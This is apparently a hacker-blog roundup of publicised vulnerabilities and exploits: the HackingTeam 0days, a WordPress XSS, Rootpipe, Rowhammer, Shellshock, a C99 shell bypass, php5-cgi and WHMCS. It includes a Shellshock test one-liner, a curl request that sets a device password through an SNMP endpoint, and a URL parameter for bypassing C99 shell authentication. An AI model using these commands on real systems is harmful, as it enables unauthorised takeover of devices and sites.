HackingTeam 0days
Two 0days were in the release from the HackingTeam dump. one for flash and one for win8.1 32bit. Get them ::HERE:: and ::HERE::
Two 0days were in the release from the HackingTeam dump. one for flash and one for win8.1 32bit. Get them ::HERE:: and ::HERE::
WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen. It allows an attacker to inject code into the HTML content received by administrators who maintain the website. Recommended that you update to WordPress 4.2.1.
::Source::
The Admin framework in Apple OS X contains a hidden backdoor API Privilege Escalation to root privileges. It’s been there for several years (at least since 2011). Metasploit has added the POC module to their repo Mac OS X “Rootpipe” Users who aren’t running “yosemite” are shit out of luck so far, Apple had no plans to fix.
More info:truesecdev...
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
More info: Exploiting the DRAM rowhammer bug to gain kernel privileges
A remotely exploitable vulnerability has been discovered in bash on Linux. The vulnerability affects Debian as well as other Linux distros, patch ASAP.
$ env x='() { :;}; echo vulnerable’ bash -c “echo test”
more info: securityblog.redhat.com
curl -isk -X ‘GET’ -b ‘credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9’ ‘http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;’
C99.php Shell has a Authentication Bypass Vulnerability, a backdoor, due to the use of the extract() comm, To bypass authentication add “?c99shcook[login]=0” to the URL. More info is ::HERE::
You can also go find ya some
One of my friends released a modded version of Samiux’s original heartbleed script to run over Tor and also tweaked it a bit to improve speed and stability. Check it out. https://github.com/mb1689/tortbleed/ Should be added to Samiux’s repo soon
Kingcope droppin’ a new 0day, the vulnerability is present in the default install
of the php5-cgi package. http://www.exploit-db.com/exploits/29290/
WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed. Leaseweb, PureVPN were owned within a few hours.
POC HERE